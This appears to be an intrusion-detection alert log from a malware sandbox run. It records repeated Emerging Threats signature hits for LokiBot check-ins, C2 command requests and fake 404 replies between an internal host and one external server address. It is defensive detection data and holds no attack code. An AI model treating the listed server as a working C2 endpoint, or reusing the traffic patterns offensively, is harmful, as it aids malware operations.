                                                                          2024-11-22T17:39:06.624697+01002025381ET MALWARE LokiBot Checkin1192.168.2.44978894.156.177.4180TCP
                                                                          2024-11-22T17:39:06.624697+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44978894.156.177.4180TCP
                                                                          2024-11-22T17:39:07.860411+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44978894.156.177.4180TCP
                                                                          2024-11-22T17:39:07.860411+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44978894.156.177.4180TCP
                                                                          2024-11-22T17:39:07.980188+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449788TCP
                                                                          2024-11-22T17:39:08.251882+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44979494.156.177.4180TCP
                                                                          2024-11-22T17:39:08.251882+01002025381ET MALWARE LokiBot Checkin1192.168.2.44979494.156.177.4180TCP
                                                                          2024-11-22T17:39:08.251882+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44979494.156.177.4180TCP
                                                                          2024-11-22T17:39:09.682146+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44979494.156.177.4180TCP
                                                                          2024-11-22T17:39:09.682146+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44979494.156.177.4180TCP
                                                                          2024-11-22T17:39:09.802909+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449794TCP
                                                                          2024-11-22T17:39:10.075035+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980094.156.177.4180TCP
                                                                          2024-11-22T17:39:10.075035+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980094.156.177.4180TCP
                                                                          2024-11-22T17:39:10.075035+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980094.156.177.4180TCP
                                                                          2024-11-22T17:39:11.305204+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980094.156.177.4180TCP
                                                                          2024-11-22T17:39:11.305204+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980094.156.177.4180TCP
                                                                          2024-11-22T17:39:11.424821+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449800TCP
                                                                          2024-11-22T17:39:11.694205+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980694.156.177.4180TCP
                                                                          2024-11-22T17:39:11.694205+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980694.156.177.4180TCP
                                                                          2024-11-22T17:39:11.694205+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980694.156.177.4180TCP
                                                                          2024-11-22T17:39:13.054807+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980694.156.177.4180TCP
                                                                          2024-11-22T17:39:13.054807+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980694.156.177.4180TCP
                                                                          2024-11-22T17:39:13.174861+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449806TCP
                                                                          2024-11-22T17:39:13.452854+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44980794.156.177.4180TCP
                                                                          2024-11-22T17:39:13.452854+01002025381ET MALWARE LokiBot Checkin1192.168.2.44980794.156.177.4180TCP
                                                                          2024-11-22T17:39:13.452854+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44980794.156.177.4180TCP
                                                                          2024-11-22T17:39:14.727841+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44980794.156.177.4180TCP
                                                                          2024-11-22T17:39:14.727841+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44980794.156.177.4180TCP
                                                                          2024-11-22T17:39:14.848103+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449807TCP
                                                                          2024-11-22T17:39:15.106129+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44981494.156.177.4180TCP
                                                                          2024-11-22T17:39:15.106129+01002025381ET MALWARE LokiBot Checkin1192.168.2.44981494.156.177.4180TCP
                                                                          2024-11-22T17:39:15.106129+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44981494.156.177.4180TCP
                                                                          2024-11-22T17:39:16.481024+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44981494.156.177.4180TCP
                                                                          2024-11-22T17:39:16.481024+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44981494.156.177.4180TCP
                                                                          2024-11-22T17:39:16.600800+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449814TCP
                                                                          2024-11-22T17:39:16.873576+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982094.156.177.4180TCP
                                                                          2024-11-22T17:39:16.873576+01002025381ET MALWARE LokiBot Checkin1192.168.2.44982094.156.177.4180TCP
                                                                          2024-11-22T17:39:16.873576+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982094.156.177.4180TCP
                                                                          2024-11-22T17:39:18.289205+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982094.156.177.4180TCP
                                                                          2024-11-22T17:39:18.289205+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982094.156.177.4180TCP
                                                                          2024-11-22T17:39:18.412865+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449820TCP
                                                                          2024-11-22T17:39:18.772634+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44982694.156.177.4180TCP
                                                                          2024-11-22T17:39:18.772634+01002025381ET MALWARE LokiBot Checkin1192.168.2.44982694.156.177.4180TCP
                                                                          2024-11-22T17:39:18.772634+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44982694.156.177.4180TCP
                                                                          2024-11-22T17:39:20.131550+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44982694.156.177.4180TCP
                                                                          2024-11-22T17:39:20.131550+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44982694.156.177.4180TCP
                                                                          2024-11-22T17:39:20.251127+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449826TCP
                                                                          2024-11-22T17:39:20.515914+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983094.156.177.4180TCP
                                                                          2024-11-22T17:39:20.515914+01002025381ET MALWARE LokiBot Checkin1192.168.2.44983094.156.177.4180TCP
                                                                          2024-11-22T17:39:20.515914+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983094.156.177.4180TCP
                                                                          2024-11-22T17:39:21.922262+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983094.156.177.4180TCP
                                                                          2024-11-22T17:39:21.922262+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983094.156.177.4180TCP
                                                                          2024-11-22T17:39:22.044326+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449830TCP
                                                                          2024-11-22T17:39:22.314600+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983494.156.177.4180TCP
                                                                          2024-11-22T17:39:22.314600+01002025381ET MALWARE LokiBot Checkin1192.168.2.44983494.156.177.4180TCP
                                                                          2024-11-22T17:39:22.314600+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983494.156.177.4180TCP
                                                                          2024-11-22T17:39:23.676175+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983494.156.177.4180TCP
                                                                          2024-11-22T17:39:23.676175+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983494.156.177.4180TCP
                                                                          2024-11-22T17:39:23.796270+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449834TCP
                                                                          2024-11-22T17:39:24.067071+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44983994.156.177.4180TCP
                                                                          2024-11-22T17:39:24.067071+01002025381ET MALWARE LokiBot Checkin1192.168.2.44983994.156.177.4180TCP
                                                                          2024-11-22T17:39:24.067071+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44983994.156.177.4180TCP
                                                                          2024-11-22T17:39:25.302977+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44983994.156.177.4180TCP
                                                                          2024-11-22T17:39:25.302977+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44983994.156.177.4180TCP
                                                                          2024-11-22T17:39:25.422629+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449839TCP
                                                                          2024-11-22T17:39:25.697513+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44984594.156.177.4180TCP
                                                                          2024-11-22T17:39:25.697513+01002025381ET MALWARE LokiBot Checkin1192.168.2.44984594.156.177.4180TCP
                                                                          2024-11-22T17:39:25.697513+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44984594.156.177.4180TCP
                                                                          2024-11-22T17:39:27.054176+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44984594.156.177.4180TCP
                                                                          2024-11-22T17:39:27.054176+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44984594.156.177.4180TCP
                                                                          2024-11-22T17:39:27.173859+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449845TCP
                                                                          2024-11-22T17:39:27.435691+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985194.156.177.4180TCP
                                                                          2024-11-22T17:39:27.435691+01002025381ET MALWARE LokiBot Checkin1192.168.2.44985194.156.177.4180TCP
                                                                          2024-11-22T17:39:27.435691+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985194.156.177.4180TCP
                                                                          2024-11-22T17:39:28.889019+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985194.156.177.4180TCP
                                                                          2024-11-22T17:39:28.889019+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985194.156.177.4180TCP
                                                                          2024-11-22T17:39:29.008704+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449851TCP
                                                                          2024-11-22T17:39:29.277428+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985394.156.177.4180TCP
                                                                          2024-11-22T17:39:29.277428+01002025381ET MALWARE LokiBot Checkin1192.168.2.44985394.156.177.4180TCP
                                                                          2024-11-22T17:39:29.277428+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985394.156.177.4180TCP
                                                                          2024-11-22T17:39:30.602180+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985394.156.177.4180TCP
                                                                          2024-11-22T17:39:30.602180+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985394.156.177.4180TCP
                                                                          2024-11-22T17:39:30.723332+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449853TCP
                                                                          2024-11-22T17:39:30.980502+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44985894.156.177.4180TCP
                                                                          2024-11-22T17:39:30.980502+01002025381ET MALWARE LokiBot Checkin1192.168.2.44985894.156.177.4180TCP
                                                                          2024-11-22T17:39:30.980502+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44985894.156.177.4180TCP
                                                                          2024-11-22T17:39:32.319975+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44985894.156.177.4180TCP
                                                                          2024-11-22T17:39:32.319975+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44985894.156.177.4180TCP
                                                                          2024-11-22T17:39:32.439587+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449858TCP
                                                                          2024-11-22T17:39:32.779202+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986494.156.177.4180TCP
                                                                          2024-11-22T17:39:32.779202+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986494.156.177.4180TCP
                                                                          2024-11-22T17:39:32.779202+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986494.156.177.4180TCP
                                                                          2024-11-22T17:39:34.064527+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986494.156.177.4180TCP
                                                                          2024-11-22T17:39:34.064527+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986494.156.177.4180TCP
                                                                          2024-11-22T17:39:34.184105+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449864TCP
                                                                          2024-11-22T17:39:34.454700+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44986994.156.177.4180TCP
                                                                          2024-11-22T17:39:34.454700+01002025381ET MALWARE LokiBot Checkin1192.168.2.44986994.156.177.4180TCP
                                                                          2024-11-22T17:39:34.454700+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44986994.156.177.4180TCP
                                                                          2024-11-22T17:39:35.909915+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44986994.156.177.4180TCP
                                                                          2024-11-22T17:39:35.909915+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44986994.156.177.4180TCP
                                                                          2024-11-22T17:39:36.030123+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449869TCP
                                                                          2024-11-22T17:39:36.638264+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987594.156.177.4180TCP
                                                                          2024-11-22T17:39:36.638264+01002025381ET MALWARE LokiBot Checkin1192.168.2.44987594.156.177.4180TCP
                                                                          2024-11-22T17:39:36.638264+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987594.156.177.4180TCP
                                                                          2024-11-22T17:39:37.911435+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987594.156.177.4180TCP
                                                                          2024-11-22T17:39:37.911435+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987594.156.177.4180TCP
                                                                          2024-11-22T17:39:38.031130+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449875TCP
                                                                          2024-11-22T17:39:38.319161+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44987894.156.177.4180TCP
                                                                          2024-11-22T17:39:38.319161+01002025381ET MALWARE LokiBot Checkin1192.168.2.44987894.156.177.4180TCP
                                                                          2024-11-22T17:39:38.319161+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44987894.156.177.4180TCP
                                                                          2024-11-22T17:39:39.774405+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44987894.156.177.4180TCP
                                                                          2024-11-22T17:39:39.774405+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44987894.156.177.4180TCP
                                                                          2024-11-22T17:39:39.893944+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449878TCP
                                                                          2024-11-22T17:39:40.156593+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988394.156.177.4180TCP
                                                                          2024-11-22T17:39:40.156593+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988394.156.177.4180TCP
                                                                          2024-11-22T17:39:40.156593+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988394.156.177.4180TCP
                                                                          2024-11-22T17:39:41.435946+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988394.156.177.4180TCP
                                                                          2024-11-22T17:39:41.435946+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988394.156.177.4180TCP
                                                                          2024-11-22T17:39:41.556669+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449883TCP
                                                                          2024-11-22T17:39:41.832002+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44988994.156.177.4180TCP
                                                                          2024-11-22T17:39:41.832002+01002025381ET MALWARE LokiBot Checkin1192.168.2.44988994.156.177.4180TCP
                                                                          2024-11-22T17:39:41.832002+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44988994.156.177.4180TCP
                                                                          2024-11-22T17:39:43.209941+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44988994.156.177.4180TCP
                                                                          2024-11-22T17:39:43.209941+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44988994.156.177.4180TCP
                                                                          2024-11-22T17:39:43.330266+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449889TCP
                                                                          2024-11-22T17:39:43.599899+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44989494.156.177.4180TCP
                                                                          2024-11-22T17:39:43.599899+01002025381ET MALWARE LokiBot Checkin1192.168.2.44989494.156.177.4180TCP
                                                                          2024-11-22T17:39:43.599899+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44989494.156.177.4180TCP
                                                                          2024-11-22T17:39:44.928389+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44989494.156.177.4180TCP
                                                                          2024-11-22T17:39:44.928389+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44989494.156.177.4180TCP
                                                                          2024-11-22T17:39:45.051310+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449894TCP
                                                                          2024-11-22T17:39:45.307094+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44989894.156.177.4180TCP
                                                                          2024-11-22T17:39:45.307094+01002025381ET MALWARE LokiBot Checkin1192.168.2.44989894.156.177.4180TCP
                                                                          2024-11-22T17:39:45.307094+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44989894.156.177.4180TCP
                                                                          2024-11-22T17:39:46.764115+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44989894.156.177.4180TCP
                                                                          2024-11-22T17:39:46.764115+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44989894.156.177.4180TCP
                                                                          2024-11-22T17:39:46.887092+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449898TCP
                                                                          2024-11-22T17:39:47.159997+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990294.156.177.4180TCP
                                                                          2024-11-22T17:39:47.159997+01002025381ET MALWARE LokiBot Checkin1192.168.2.44990294.156.177.4180TCP
                                                                          2024-11-22T17:39:47.159997+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990294.156.177.4180TCP
                                                                          2024-11-22T17:39:48.566331+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990294.156.177.4180TCP
                                                                          2024-11-22T17:39:48.566331+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990294.156.177.4180TCP
                                                                          2024-11-22T17:39:48.686602+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449902TCP
                                                                          2024-11-22T17:39:49.169189+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44990794.156.177.4180TCP
                                                                          2024-11-22T17:39:49.169189+01002025381ET MALWARE LokiBot Checkin1192.168.2.44990794.156.177.4180TCP
                                                                          2024-11-22T17:39:49.169189+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44990794.156.177.4180TCP
                                                                          2024-11-22T17:39:50.496975+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44990794.156.177.4180TCP
                                                                          2024-11-22T17:39:50.496975+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44990794.156.177.4180TCP
                                                                          2024-11-22T17:39:50.616894+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449907TCP
                                                                          2024-11-22T17:39:50.892509+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991394.156.177.4180TCP
                                                                          2024-11-22T17:39:50.892509+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991394.156.177.4180TCP
                                                                          2024-11-22T17:39:50.892509+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991394.156.177.4180TCP
                                                                          2024-11-22T17:39:52.341897+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991394.156.177.4180TCP
                                                                          2024-11-22T17:39:52.341897+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991394.156.177.4180TCP
                                                                          2024-11-22T17:39:52.461465+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449913TCP
                                                                          2024-11-22T17:39:52.742489+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44991794.156.177.4180TCP
                                                                          2024-11-22T17:39:52.742489+01002025381ET MALWARE LokiBot Checkin1192.168.2.44991794.156.177.4180TCP
                                                                          2024-11-22T17:39:52.742489+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44991794.156.177.4180TCP
                                                                          2024-11-22T17:39:54.151907+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44991794.156.177.4180TCP
                                                                          2024-11-22T17:39:54.151907+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44991794.156.177.4180TCP
                                                                          2024-11-22T17:39:54.273217+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449917TCP
                                                                          2024-11-22T17:39:54.532238+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44992294.156.177.4180TCP
                                                                          2024-11-22T17:39:54.532238+01002025381ET MALWARE LokiBot Checkin1192.168.2.44992294.156.177.4180TCP
                                                                          2024-11-22T17:39:54.532238+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44992294.156.177.4180TCP
                                                                          2024-11-22T17:39:55.765985+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44992294.156.177.4180TCP
                                                                          2024-11-22T17:39:55.765985+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44992294.156.177.4180TCP
                                                                          2024-11-22T17:39:55.885986+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449922TCP
                                                                          2024-11-22T17:39:56.154638+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44992694.156.177.4180TCP
                                                                          2024-11-22T17:39:56.154638+01002025381ET MALWARE LokiBot Checkin1192.168.2.44992694.156.177.4180TCP
                                                                          2024-11-22T17:39:56.154638+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44992694.156.177.4180TCP
                                                                          2024-11-22T17:39:57.517015+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44992694.156.177.4180TCP
                                                                          2024-11-22T17:39:57.517015+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44992694.156.177.4180TCP
                                                                          2024-11-22T17:39:57.636701+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449926TCP
                                                                          2024-11-22T17:39:57.905221+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993294.156.177.4180TCP
                                                                          2024-11-22T17:39:57.905221+01002025381ET MALWARE LokiBot Checkin1192.168.2.44993294.156.177.4180TCP
                                                                          2024-11-22T17:39:57.905221+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993294.156.177.4180TCP
                                                                          2024-11-22T17:39:59.228879+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993294.156.177.4180TCP
                                                                          2024-11-22T17:39:59.228879+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993294.156.177.4180TCP
                                                                          2024-11-22T17:39:59.348827+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449932TCP
                                                                          2024-11-22T17:39:59.617555+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44993794.156.177.4180TCP
                                                                          2024-11-22T17:39:59.617555+01002025381ET MALWARE LokiBot Checkin1192.168.2.44993794.156.177.4180TCP
                                                                          2024-11-22T17:39:59.617555+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44993794.156.177.4180TCP
                                                                          2024-11-22T17:40:01.069978+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44993794.156.177.4180TCP
                                                                          2024-11-22T17:40:01.069978+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44993794.156.177.4180TCP
                                                                          2024-11-22T17:40:01.189433+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449937TCP
                                                                          2024-11-22T17:40:01.461227+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994294.156.177.4180TCP
                                                                          2024-11-22T17:40:01.461227+01002025381ET MALWARE LokiBot Checkin1192.168.2.44994294.156.177.4180TCP
                                                                          2024-11-22T17:40:01.461227+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994294.156.177.4180TCP
                                                                          2024-11-22T17:40:02.745174+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994294.156.177.4180TCP
                                                                          2024-11-22T17:40:02.745174+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994294.156.177.4180TCP
                                                                          2024-11-22T17:40:02.986093+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449942TCP
                                                                          2024-11-22T17:40:03.120405+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44994594.156.177.4180TCP
                                                                          2024-11-22T17:40:03.120405+01002025381ET MALWARE LokiBot Checkin1192.168.2.44994594.156.177.4180TCP
                                                                          2024-11-22T17:40:03.120405+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44994594.156.177.4180TCP
                                                                          2024-11-22T17:40:04.526328+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44994594.156.177.4180TCP
                                                                          2024-11-22T17:40:04.526328+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44994594.156.177.4180TCP
                                                                          2024-11-22T17:40:04.646103+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449945TCP
                                                                          2024-11-22T17:40:04.910450+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44995194.156.177.4180TCP
                                                                          2024-11-22T17:40:04.910450+01002025381ET MALWARE LokiBot Checkin1192.168.2.44995194.156.177.4180TCP
                                                                          2024-11-22T17:40:04.910450+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44995194.156.177.4180TCP
                                                                          2024-11-22T17:40:06.269586+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44995194.156.177.4180TCP
                                                                          2024-11-22T17:40:06.269586+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44995194.156.177.4180TCP
                                                                          2024-11-22T17:40:06.389791+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449951TCP
                                                                          2024-11-22T17:40:06.653374+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44995794.156.177.4180TCP
                                                                          2024-11-22T17:40:06.653374+01002025381ET MALWARE LokiBot Checkin1192.168.2.44995794.156.177.4180TCP
                                                                          2024-11-22T17:40:06.653374+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44995794.156.177.4180TCP
                                                                          2024-11-22T17:40:08.104776+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44995794.156.177.4180TCP
                                                                          2024-11-22T17:40:08.104776+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44995794.156.177.4180TCP
                                                                          2024-11-22T17:40:08.225755+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449957TCP
                                                                          2024-11-22T17:40:08.480379+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44996194.156.177.4180TCP
                                                                          2024-11-22T17:40:08.480379+01002025381ET MALWARE LokiBot Checkin1192.168.2.44996194.156.177.4180TCP
                                                                          2024-11-22T17:40:08.480379+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44996194.156.177.4180TCP
                                                                          2024-11-22T17:40:09.891749+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44996194.156.177.4180TCP
                                                                          2024-11-22T17:40:09.891749+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44996194.156.177.4180TCP
                                                                          2024-11-22T17:40:10.011540+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449961TCP
                                                                          2024-11-22T17:40:10.283380+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44996594.156.177.4180TCP
                                                                          2024-11-22T17:40:10.283380+01002025381ET MALWARE LokiBot Checkin1192.168.2.44996594.156.177.4180TCP
                                                                          2024-11-22T17:40:10.283380+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44996594.156.177.4180TCP
                                                                          2024-11-22T17:40:11.557939+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44996594.156.177.4180TCP
                                                                          2024-11-22T17:40:11.557939+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44996594.156.177.4180TCP
